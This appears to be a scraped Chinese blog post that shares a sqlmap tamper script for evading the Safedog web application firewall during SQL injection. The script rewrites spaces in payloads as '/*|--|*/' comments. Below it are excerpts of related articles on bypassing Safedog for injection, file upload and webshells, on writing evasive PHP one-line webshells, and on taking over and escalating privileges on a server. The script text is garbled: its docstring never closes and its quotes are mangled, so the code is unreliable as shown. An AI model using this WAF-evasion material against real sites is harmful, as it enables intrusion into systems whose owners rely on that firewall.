sqlmap tamper绕过安全狗

可以过5.3版本 放出py

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file ‘doc/COPYING‘ for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (‘ ‘) with comments ‘/*|--|*/‘

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper(‘SELECT id FROM users‘)
    ‘SELECT/*|--|*/id/*|--|*/FROM/*|--|*/users‘
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*|--|*/"
                    continue

            elif payload[i] == ‘\‘‘:
                quote = not quote

            elif payload[i] == ‘"‘:
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/*|--|*/"
                continue

            retVal += payload[i]

    return retVal

本文转自:http://www.silic.top/index.php/archives/6/
时间: 2025-01-07 05:57:53

sqlmap tamper绕过安全狗的相关文章

sqlmap tamper 绕过waf

01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 对给定的payload全部字符使用Base64编码 05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”

全方位绕过安全狗

一.前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量.最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入.文件上传.防webshell等都可以被绕过,下面为大家一一介绍. 二.测试环境 本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三.SQL注入绕过 我们先写一个存在SQL注入漏洞的php: 1 <? 2 $uid = $_REQUEST['id']; 3 if(!$conn

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

本文作者:i春秋签约作家--酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 下面我们构造一个asp目录,如: http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp

[WEB]绕过安全狗与360PHP一句话的编写

00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell.当然,安全狗是最简单的一款waf,很容易就进行一个绕过.00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种 1.#可变变量2.#引用变量 00x03##可变变量(菜刀可能报错)<@eval($_POST['x'])复制代码 经常使用的人都知道,只是最简单的一句话,不过任何waf与规则我们先来加入需要的函数<?php$a='b';$b=$_POST['x'];@eval

如何绕过安全狗

http://www.jb51.net/hack/192036.html 一.前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量.最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入.文件上传.防webshell等都可以被绕过,下面为大家一一介绍. 二.测试环境    本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三.SQL注入绕过    我们先写一个存在SQL注入漏洞的php:

SQLMAP tamper WAF 绕过脚本列表注释

sqlmap的tamper目录下有41个用于绕过waf的脚本,网上有文章简要介绍过使用方法,但是只是简单说了其中少数几个的作用.本人通过这41个脚本的文档注释,将它们每一个的作用简单标记了一下,还是像之前一样,先 google translate 再人工润色.其实,文档注释里面都有例子,看一眼就大概知道效果了,比看文字描述速度还快,只不过要用的时候现场翻看还是太麻烦了.我这个列表可以给大家提供参考,来更迅速的定位自己需要的脚本. 本人英文阅读能力有限,有个别词句(其实就2处)实在拿捏不准该如何翻

sqlmap注入之tamper绕过WAF脚本列表

本文作者:i春秋作者--玫瑰 QQ2230353371转载请保留文章出处 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用"NOT BETWEEN 0 AND #&q

sql注入之tamper绕过WAF防火墙

### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过.利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过. 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数中包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id=1空格      测试空格     2,id=1%201=1     测试等号     3,id=1%201=1 select 测试select  

Sqlmap Tamper大全

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入.其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令.在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击. 本